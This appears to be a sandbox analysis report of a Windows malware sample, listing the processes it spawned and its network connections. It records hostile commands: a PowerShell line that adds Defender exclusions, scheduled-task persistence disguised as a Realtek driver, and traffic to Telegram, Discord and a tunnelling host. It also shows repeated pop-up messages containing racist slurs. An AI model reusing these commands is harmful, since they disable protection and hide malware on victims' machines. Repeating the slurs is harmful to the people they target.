"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_xpay_wallet.mojom.EdgeXPayWalletService --lang=de --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=15624,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=15332 /prefetch:14
C:\Windows\SYSTEM32\schtasks.exe
"schtasks.exe" /query /TN $77RealtekAudioDriverHost.exe
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks.exe" /Create /SC ONCE /TN "$77RealtekAudioDriverHost.exe" /TR "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe \"\$77RealtekAudioDriverHost.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --always-read-main-dll --field-trial-handle=15804,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=15812 /prefetch:1
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks.exe" /query /TN $77RealtekAudioDriverHost.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc daily /tn "RealtekAudioDriverHost_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --always-read-main-dll --field-trial-handle=16036,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=16088 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --always-read-main-dll --field-trial-handle=16228,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=16280 /prefetch:1
C:\Users\Admin\AppData\Local\Windows Host Service.scr
"C:\Users\Admin\AppData\Local\Windows Host Service.scr"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --always-read-main-dll --field-trial-handle=4796,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=4784 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --always-read-main-dll --field-trial-handle=17000,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=17004 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --always-read-main-dll --field-trial-handle=17604,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=17612 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --always-read-main-dll --field-trial-handle=17656,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=17792 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --always-read-main-dll --field-trial-handle=17944,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=17968 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --always-read-main-dll --field-trial-handle=18172,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=18180 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --always-read-main-dll --field-trial-handle=18112,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=18312 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --always-read-main-dll --field-trial-handle=18472,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=18488 /prefetch:1
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --always-read-main-dll --field-trial-handle=18676,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=18696 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --always-read-main-dll --field-trial-handle=18824,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=18872 /prefetch:1
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --always-read-main-dll --field-trial-handle=19040,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=19032 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --always-read-main-dll --field-trial-handle=19216,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=19240 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --always-read-main-dll --field-trial-handle=19580,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=19624 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --always-read-main-dll --field-trial-handle=19768,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=19776 /prefetch:1
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --always-read-main-dll --field-trial-handle=19940,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=19936 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | sky-aerial-derby.glitch.me | udp |
| US | 151.101.2.59:443 | sky-aerial-derby.glitch.me | tcp |
| US | 192.124.249.41:80 | crl.starfieldtech.com | tcp |
| US | 151.101.67.3:80 | ocsp.int-r1.certainly.com | tcp |
| US | 151.101.2.59:443 | sky-aerial-derby.glitch.me | tcp |
| N/A | 127.0.0.1:49803 | tcp | |
| N/A | 127.0.0.1:49810 | tcp | |
| US | 162.159.129.232:443 | media.discordapp.net | tcp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
| US | 162.159.129.232:443 | media.discordapp.net | tcp |
| N/A | 127.0.0.1:49844 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| N/A | 127.0.0.1:49849 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | pattern-cyber-report.glitch.me | udp |
| US | 8.8.8.8:53 | pattern-cyber-report.glitch.me | udp |
| US | 150.171.27.11:80 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | copilot.microsoft.com | udp |
| US | 8.8.8.8:53 | copilot.microsoft.com | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 151.101.66.59:443 | pattern-cyber-report.glitch.me | tcp |
| GB | 95.100.153.132:443 | copilot.microsoft.com | tcp |
| IE | 94.245.104.56:443 | api.edgeoffer.microsoft.com | tcp |
| IE | 94.245.104.56:443 | api.edgeoffer.microsoft.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| IE | 94.245.104.56:443 | api.edgeoffer.microsoft.com | tcp |
| US | 151.101.66.59:443 | pattern-cyber-report.glitch.me | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | niggafart.com | udp |
| US | 8.8.8.8:53 | niggafart.com | udp |
| US | 104.21.66.212:443 | niggafart.com | udp |
| US | 104.21.66.212:443 | niggafart.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 151.101.66.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 104.21.66.212:443 | niggafart.com | udp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 95.100.153.147:443 | www.bing.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | xpaywalletcdn.azureedge.net | udp |
| US | 8.8.8.8:53 | xpaywalletcdn.azureedge.net | udp |
| US | 13.107.246.64:443 | xpaywalletcdn.azureedge.net | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
